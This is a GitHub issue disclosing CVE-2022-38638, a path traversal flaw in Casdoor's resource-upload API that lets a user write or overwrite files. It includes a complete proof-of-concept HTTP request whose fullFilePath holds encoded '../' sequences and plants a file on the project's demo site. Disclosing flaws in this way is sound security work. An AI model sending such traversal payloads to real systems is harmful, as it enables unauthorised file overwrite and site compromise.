CVE-2022-38638: Arbitrary file write/overwrite Vulnerability · Issue #1035 · casdoor/casdoor

Hi, I found a security issue, when the upload provider is Storage Local File System, the fullFilePath parameter of the interface /api/upload-resource will have a directory spanning problem, the user can specify a relative path to write malicious files to the file system, or even overwrite the files, my request message is shown below：

POST /api/upload-resource?owner=built-in&user=admin&application=app-built-in&tag=custom&parent=provider_storage_local_file_system&fullFilePath=resource%2F%2e%2e%2F%2e%2e%2Fweb%2Fbuild%2Fflag.html&provider=provider_storage_local_file_system HTTP/1.1 Host: door.casdoor.com Cookie: casdoor_session_id=2fd9ab275d8d65ea296ab327fd92166a Content-Length: 192 Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="103", “Chromium";v="103” Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Sec-Ch-Ua-Platform: “macOS” Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUPAwhIoXMrbemuJM Accept: */* Origin: https://door.casdoor.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://door.casdoor.com/resources Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close

------WebKitFormBoundaryUPAwhIoXMrbemuJM Content-Disposition: form-data; name="file"; filename="spider.png" Content-Type: image/png

I’m here. ------WebKitFormBoundaryUPAwhIoXMrbemuJM–

Then we can find out that the problem does occur by following this link。
https://door.casdoor.com/flag.html